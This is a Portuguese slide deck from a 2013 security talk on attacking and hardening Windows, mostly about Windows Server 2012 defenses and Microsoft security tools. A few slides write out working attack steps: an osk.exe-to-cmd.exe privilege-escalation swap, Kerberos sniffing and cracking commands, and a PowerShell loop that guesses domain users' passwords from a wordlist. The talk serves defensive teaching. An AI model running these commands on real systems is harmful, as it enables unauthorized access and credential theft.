Hacking Windows Systems Ataques e Defesas Hacking Day 2013 Princípios de segurança e novidades do Windows Server 2012 DANIEL DONDA MVP Windows Expert-IT Pro MCP,MCT,MCITP-EA, MCSA+Security, MCSE+Security, MCSE+Messaging EC-CEH V8 EC-CEI www.mcsesolution.com www.infosecbrasil.org twitter: @danieldonda http://mvp.microsoft.com/pt-br/ 1
Agenda Apresentação Segurança e Microsoft Uma analise através do tempo Porque é fácil atacar o Windows? O Windows sem Windows (Reduzindo a superfície de ataque) Hardening Windows Server 2012 Kerbsniff, KerbCrack e o Kerberos Armoring 10 importantes recursos e dicas MSFT 2
Metas para a sessão de hoje Princípios de segurança e novidades 3
Segurança e Microsoft Uma analise através do tempo
Windows History 1975 1981: Microsoft inicia. 1981 MS-DOS 1982 1985: Windows 1.0 1987 1992: Windows 2.0 2.11 1990 1994: Windows 3.0 Windows NT 1995 2001: Windows 95 1998 2000: Windows 98, Windows 2000, Windows Me - Internet 2001 2005: Windows XP - Consciência de vírus de computador e hackers 2006 2008: Windows Vista 1,5 milhões de dispositivos são compatíveis 2009: Windows 7-8 Milhões de beta-testers no mundo 2012: Windows 8 Recursos avançados de segurança 5
Porque é fácil atacar o Windows? 6
Atacando o Windows 1 Usuário / Admin (60.000.000) 2 Softwares desnecessários 3 Configuração Incorreta 4 Softwares desatualizados 5 OS desatualizado 5 Falta de conhecimento 7
1 - Elevação de privilégio CD\Windows\System32\ COPY OSK.EXE OSK.OLD2 takeown /F osk.exe cacls osk.exe /G Administrator:F /E COPY CMD.EXE OSK.EXE 8
2 - Kerberos Atack vs Kerberos Armoring Kerbsniff kerbs.txt KerbCrack kerbs.txt d kgodoi http://ntsecurity.nu/toolbox/kerbcrack/ RFC 6113 - Flexible Authentication Secure Tunnel (FAST)
3- Proteção de acesso a dados SMB 3.0 01001010110111011101010111011101011011 net use x: \\servidor\dados x: type senhas.txt Servidor SMB 3 utiliza um novo algoritmo para assinatura - AES-CMAC em vez do HMAC-SHA256 usado por SMB 2. 10
Proteção de acesso a dados - DAC Dynamic Access Control Controlar quem pode acessar informação e auditar quem teve acesso a informação. Classificar arquivos para toda a corporação. Auditar o acesso a arquivos usando as diretivas de auditoria centrais para geração de relatórios de conformidade e análise forense. Aplicar proteção Rights Management Services (RMS) 11
O Windows sem Windows Reduzindo a superfície de ataque 12
Windows Server Core Menos uso de recursos Menos serviços e recursos Menos reboot Redução de Updates em até 70% Menos superfície de ataque 13
Recursos do Server Core Active Directory Certificate Services Active Directory Domain Services DHCP Server DNS Server File Services (including File Server Resource Manager) Active Directory Lightweight Directory Services (AD LDS) Hyper-V Print and Document Services Streaming Media Services Web Server (including a subset of ASP.NET) Windows Server Update Server Active Directory Rights Management Server Routing and Remote Access Server 14
Server-Gui-Mgmt-Infra Server-Gui-Mgmt-Infra, Server-Gui-Shell Server-Gui-Mgmt-Infra, Server-Gui-Shell, Desktop-Experience Opções do Server Core Opção de instalação do Server Core Interface Mínima do Servidor Opção de instalação Servidor com GUI Recurso Experiência Desktop instalado Prompt de comando disponível disponível disponível disponível Windows PowerShell / Windows.NET disponíveis disponíveis disponíveis disponíveis Gerenciador do Servidor não disponível disponível disponível disponível Console de Gerenciamento Microsoft não disponível disponível disponível disponível Painel de Controle não disponível não disponível disponível disponível Miniaplicativos do Painel de Controle não disponíveis alguns disponíveis disponíveis disponíveis Windows Explorer não disponível não disponível disponível disponível Barra de tarefas não disponível não disponível disponível disponível Área de notificação não disponível não disponível disponível disponível Internet Explorer não disponível não disponível disponível disponível Sistema de ajuda integrado não disponível não disponível disponível disponível Temas não disponíveis não disponíveis não disponíveis disponíveis tela Iniciar estilo Metro não disponível não disponível não disponível disponível Aplicativos estilo Metro não disponíveis não disponíveis não disponíveis disponíveis Windows Media Player não disponível não disponível não disponível disponível 15
O que é o Microsoft Hyper-V Server? Microsoft hypervisor Command Line Interface Não possui licença de SO Standalone Hyper-V Download gratuito do ISO Gerenciamento Remoto 16
Hardening Windows Server 2012 17
Features on Demand PowerShell DISM 18
Security Configuration Wizard 19
Password Settings Object 20
10 importantes recursos e dicas da MSFT 21
1-Microsoft Security Intelligence Report O Microsoft Security Intelligence Report (SIR) é um relatório trimestral sobre vulnerabilidades de software, exploração de vulnerabilidades de software e softwares maliciosos e potencialmente indesejados. www.microsoft.com/sir 22
2 - Microsoft Security Response Center O Microsoft Security Response Center (MSRC) identifica, monitora, resolve, e responde a incidentes de segurança e vulnerabilidades de segurança de software Microsoft. Estamos em 24 horas de alerta de segurança todos os dias, grupos de notícias de segurança, monitorar e responder a mais de 100.000 e-mails de clientes anualmente enviados para secure@microsoft.com. http://www.microsoft.com/security/msrc/default.aspx 23
3 - Microsoft Security Compliance Manager O SCM é uma ferramenta gratuita da Microsoft que permite configurar rapidamente e gerenciar os computadores em seu ambiente com Diretiva de Grupo e Microsoft System Center Configuration Manager. SCM fornece prontos para implantar políticas e pacotes de configuração baseadas em recomendações da guia de segurança e melhores práticas da indústria, permitindo que você gerencie facilmente configurações e requisitos de conformidade para os sistemas operacionais Windows. http://technet.microsoft.com/en-us/library/cc677002.aspx 24
4 Proteção com criptografia BitLocker e Bitlocker to go BitLocker utiliza o Advanced Encryption Standard, com 128-bit e 256-bit comprimentos de chave. EFS (Encrypting File System) Criptografia de arquivos usando algoritmos RSA ou ECC 25
5 - Freeware Microsoft Tools AccessChk- Essa ferramenta mostra a você os acessos de usuário ou de grupo a arquivos, a chaves do Registro ou serviços AccessEnum - Essa ferramenta de segurança simples, mostra a você quem tem que tipo de acesso a diretórios. Sigcheck - informações sobre a versão do arquivo e verifique se as imagens em seu sistema estão assinadas digitalmente. ShareEnum - Verifique compartilhamentos de arquivos e exiba suas configurações de segurança SDelete - Substitua com segurança seus arquivos confidenciais e libere espaço livre de arquivos excluídos. Account Lockout and Management Tools Uso muito, principalmente o acctinfo.dll para exibir outros atributos no AD. PortQry Command Line Port Scanner Analise de estado das portas TCP e UDP Port Reporter Quais portas que são usadas, qual o processo está usando a porta, se o processo é um serviço Port Reporter Parser Tool - Analisador de log para arquivos de log Port Reporter. Promqry and PromqryUI Detecta Sniffers Promiscuos PromqryUI Interface grafica para promqey. Promqry linha de comando para detecção de sniffers no modo promiscuous. Windows SteadyState Não importa o que aconteça Vírus, Malware você pode voltar o seu Windows ao normal http://www.mcsesolution.com/mcsesolution/lista-de-softwares-freewaremicrosoft-tools.html 26
6 - Windows 8 contra Malware Windows 8 inclui as seguintes tecnologias novas e avançadas que proporcionam melhor defesa contra malware: Action Center Secure Boot User Account Control (UAC) Biometric Security Windows Defender Malicious Software Removal Tool Windows Firewall 27
7 - O Windows To Go O Windows To Go é uma imagem de boot do Windows 8 em um drive USB que um usuário pode iniciar em outro computador. Windows to go fornece aos usuários uma cópia portátil de um computador Windows corporativo para fornecer uma experiência de usuário consistente em certos tipos de hotdesk ou remotos cenários de trabalho. 28
8 - PowerShell ~2,430 cmdlets dsquery user -limit 0 > users foreach ($FDN in Get-Content.\users { $results =dsget user $FDN -samid $samid = $results[1].replace (" ","") Write-host $samid foreach ($password in Get-Content.\password.txt { $password = $password.replace(" "."") dsget user $FDN -u $samid -p $password > $null if ($?) { Write-host "Conta: $samid Senha: $password" } } } http://bit.ly/winps-ebook 29
9 - Newsletter de Segurança Dicas de segurança Notícias da comunidade e outras informações de segurança relevantes Biografias dos MVPs (Profissionais Mais Valiosos) de segurança Guias, recursos e práticas recomendadas de segurança Blogs, fóruns, grupos de notícias e sites de segurança Informações sobre o ciclo de vida dos produtos da Microsoft Boletins e atualizações de segurança Editoriais de executivos e especialistas em segurança da Microsoft Webcasts e chats Eventos sobre segurança online e presenciais Laboratórios práticos de segurança da Microsoft http://technet.microsoft.com/pt-br/security/ 30
10 - Microsoft Security on Twitter @Safer_Online, http://twitter.com/safer_online @MSFTSecResponse, http://twitter.com/msftsecresponse @MSFTSecurity, http://twitter.com!/msftsecurity @MSFTmmpc, http://twitter.com/msftmmpc @MicrosoftDCU, http://twitter.com!/microsoftdcu Microsoft Security on Facebook MMPC - http://www.facebook.com/#!/msftmmpc 31
Thank You! Thank you for your time and attention! http://facebook.com/mcsesolution @danieldonda 32